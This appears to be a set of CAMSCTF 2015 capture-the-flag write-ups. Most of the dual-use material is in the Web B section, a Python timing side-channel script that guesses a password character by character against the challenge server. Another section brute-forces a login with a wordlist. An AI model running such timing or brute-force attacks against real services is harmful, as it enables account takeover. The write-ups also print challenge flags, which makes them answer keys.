CAMSCTF CCTF 2015: Web B (Exploitation) Write-up

Description:

"Time is what we want most, but what we use worst." - William Penn

Solution:

          Target: http://web.camsctf.com/b/

          Intercept http request with Burp Suite.

          debug=0 ?, try to change debug to 1

          Base64 decode and get a start time and end time.

          "Time", then I see this word, I think It must about Side-channel attack, and my solution below.

	#!/usr/bin/python
	# Author: Kitwipat Towattana (@icheernoom)
	import urllib, urllib2, string, re, sys
	def minus(num):
	return float(num[0]) - float(num[1])
	url_check = 'http://web.camsctf.com/b/check.php'
	for i in list(string.printable):
	password = sys.argv[1]+i
	post_data = urllib.urlencode({'password' : password, 'debug' : '1'})
	req = urllib2.Request(url_check, post_data)
	resp = urllib2.urlopen(req).read()
	b64 = re.search("\"reply\":\"(.*)\"",resp).group(1)
	print "Password {0} : {1}".format(password,b64)
	num = b64.decode('base64').split("-")
	result = minus(num)
	print "Password {0} : {1}".format(password,result)
	'''
	root@ubuntu:~# python web300.py "" #see a different amounts of time to process.
	...[snip]...
	root@ubuntu:~# python web300.py "u"
	...[snip]...
	root@ubuntu:~# python web300.py "uH"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>n"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)["
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)[K"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)[Ks"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)[Ks5"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v"
	...[snip]...
	root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v:"
	...[snip]...
	Password uHH>nN#)[Ks5v:A : MTQyOTY3MzA5OS4zMTk2LTE0Mjk2NzMwOTkuNjAwNg==
	Password uHH>nN#)[Ks5v:A : -0.280999898911
	Password uHH>nN#)[Ks5v:B : MTQyOTY3MzA5OS45NjI2LTE0Mjk2NzMxMDAuMjQzNw==
	Password uHH>nN#)[Ks5v:B : -0.281100034714
	Password uHH>nN#)[Ks5v:C : MTQyOTY3MzEwMC41NjUtMTQyOTY3MzEwMC44NDU1
	Password uHH>nN#)[Ks5v:C : -0.28049993515
	Password uHH>nN#)[Ks5v:D : MTQyOTY3MzEwMS4xOTU5LTE0Mjk2NzMxMDEuNDgxMw==
	Password uHH>nN#)[Ks5v:D : -0.285400152206
	Password uHH>nN#)[Ks5v:E : Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
	'''

view raw web300.py hosted with ❤ by GitHub

          password=uHH>nN#)[Ks5v:E&debug=1 to get the flag. :D

Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}

CAMSCTF CCTF 2015: Python 2 (Programming) Write-up

Description:

1.) Take the RGB value of every pixel in one image.(Start at (0,0). Move down to (0,299). Go to (1,0). Move to (1,299). And so on. Read the files in numerical order.)
2.) Add all of the R values, G values, and B values in each image. (Have one R sum, one B sum, one G sum for every image.)
3.) Take these sums and convert them into strings. Take the MD5 hash of each string.
4.) Concatenate these MD5 hashes into one string.
5.) Take the MD5 hash of the new string.
6.) Do this for every image and concatenate the final MD5 hashes into one string. (Image 1 final hash + Image 2 final hash + ...)
7.) Take the MD5 of this string to get the flag.
PIL.zip

Solution: 

	#!/usr/bin/python
	# Author: Kitwipat Towattana (@icheernoom)
	import hashlib
	from PIL import Image
	md5 = []
	width = 300
	height = 300
	for i in range(0,10):
	img_file = "pixels{0}.png".format(i)
	img = Image.open(img_file)
	rgb_img = img.convert('RGB')
	xr = 0
	xg = 0
	xb = 0
	for x in range(0,width):
	for y in range(0,height):
	r, g, b = rgb_img.getpixel((x,y))
	xr += r
	xg += g
	xb += b
	r = hashlib.md5("{0}".format(xr)).hexdigest()
	g = hashlib.md5("{0}".format(xg)).hexdigest()
	b = hashlib.md5("{0}".format(xb)).hexdigest()
	sum_md5 = "{0}{1}{2}".format(r,g,b)
	concate = hashlib.md5("{0}".format(sum_md5)).hexdigest()
	print "[*] MD5 of {0}: {1}".format(img_file,concate)
	md5.append(concate)
	print "[*] Flag:",hashlib.md5("".join(md5)).hexdigest()
	'''
	root@ubuntu:/PIL# ls
	pixels0.png pixels2.png pixels4.png pixels6.png pixels8.png prog250.py
	pixels1.png pixels3.png pixels5.png pixels7.png pixels9.png Thumbs.db
	root@ubuntu:/PIL# python prog250.py
	[*] MD5 of pixels0.png: e767124634834f12a7152104d4713074
	[*] MD5 of pixels1.png: a88372d92bcc6e8f5f569bc3c00fab23
	[*] MD5 of pixels2.png: 345265539e1b9078323b7051346892de
	[*] MD5 of pixels3.png: 92ae219f8b8403e04b550eb831a017bf
	[*] MD5 of pixels4.png: a4bd4eb96fe9cc779c2e81864c81b674
	[*] MD5 of pixels5.png: 4723f098c933b160d00678b7be3421c4
	[*] MD5 of pixels6.png: 3a4c3cb7b2fd704c4e7717547f7db4d9
	[*] MD5 of pixels7.png: bc1f5bc7b30eaac677d6daa37eed5e4c
	[*] MD5 of pixels8.png: a4edf81b7f2915c4c1b72d8367c5016a
	[*] MD5 of pixels9.png: 864ae043e67a693d7672986487a87813
	[*] Flag: 2d98c27f040ce429b35dd84124397f65
	root@ubuntu:/PIL#
	'''

view raw prog250.py hosted with ❤ by GitHub

Flag: 2d98c27f040ce429b35dd84124397f65

CAMSCTF CCTF 2015: Web 2 (Exploitation) Write-up

Description: 

You're probably thinking too hard about this.

Hint:

Remember that time when you guessed the admin password? Yeah.

Solution:
          Target: http://web.camsctf.com/2/ OK, Brute force time was begin. :D, Open Burp Suite and Intercept HTTP Request and send to Intruder tab with wordlist.

          password=letmein

Flag: {still_b3tter_than_princess}

CAMSCTF CCTF 2015: Excel Data (Forensics) Write-up

Description:

Ever wonder why your homework gets corrupted so easily?

Solution: 
          Forensic challenge, In basically I try strings and grep command to find something. xD

root@ubuntu:~# file excel_data.xlsx 
excel_data.xlsx: Zip archive data, at least v1.0 to extract
root@ubuntu:~# strings excel_data.xlsx | grep "flag"
xl/charts/flag.txt
xl/charts/flag.txt
root@ubuntu:~# mv excel_data.xlsx excel_data.zip
root@ubuntu:~# unzip excel_data.zip 
Archive:  excel_data.zip
   creating: docProps/
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
   creating: xl/
  inflating: xl/calcChain.xml        
   creating: xl/charts/
  inflating: xl/charts/chart1.xml    
  inflating: xl/charts/chart2.xml    
  inflating: xl/charts/flag.txt      
   creating: xl/drawings/
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/drawings/drawing2.xml  
   creating: xl/drawings/_rels/
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/drawings/_rels/drawing2.xml.rels  
  inflating: xl/sharedStrings.xml    
  inflating: xl/styles.xml           
   creating: xl/theme/
  inflating: xl/theme/theme1.xml     
  inflating: xl/workbook.xml         
   creating: xl/worksheets/
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/worksheets/sheet3.xml  
  inflating: xl/worksheets/sheet4.xml  
   creating: xl/worksheets/_rels/
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/worksheets/_rels/sheet3.xml.rels  
   creating: xl/_rels/
  inflating: xl/_rels/workbook.xml.rels  
  inflating: [Content_Types].xml     
   creating: _rels/
  inflating: _rels/.rels             
root@ubuntu:~# cat xl/charts/flag.txt 
{iT's_r1gh7_h3r3}
root@ubuntu:~#

Flag: {iT's_r1gh7_h3r3}

CAMSCTF CCTF 2015: Trivia 1-5 (Recon) Write-up

Challenge: Trivia 1
Description:

What is Microsoft's code name for their new internet browser?

Solution: http://en.wikipedia.org/wiki/List_of_Microsoft_codenames
Flag: Spartan

Challenge: Trivia 2
Description:

What is arguably the smallest Linux distribution with a GUI that is still being developed?

Solution: http://www.junauza.com/2011/07/5-tiniest-linux-distributions-for-your.html
Flag: Tiny Core Linux

Challenge: Trivia 3
Description:

As of 2014, how many terabytes of data has Google Inc. indexed? Answer in form of an integer followed by the unit.

Solution: http://www.websitemagazine.com/content/blogs/posts/archive/2014/07/22/do-you-know-how-big-the-internet-really-is-infographic.aspx
Flag: 200 terabytes

Challenge: Trivia 4
Description:

What is the official fastest clock speed of any computer?

Solution: http://en.wikipedia.org/wiki/Clock_rate
Flag: 8.805 GHz

Challenge: Trivia 5
Description:

Which OS is most popular for the Raspberry Pi?

Solution: http://www.linuxuser.co.uk/reviews/top-4-raspberry-pi-os
Flag: Raspbian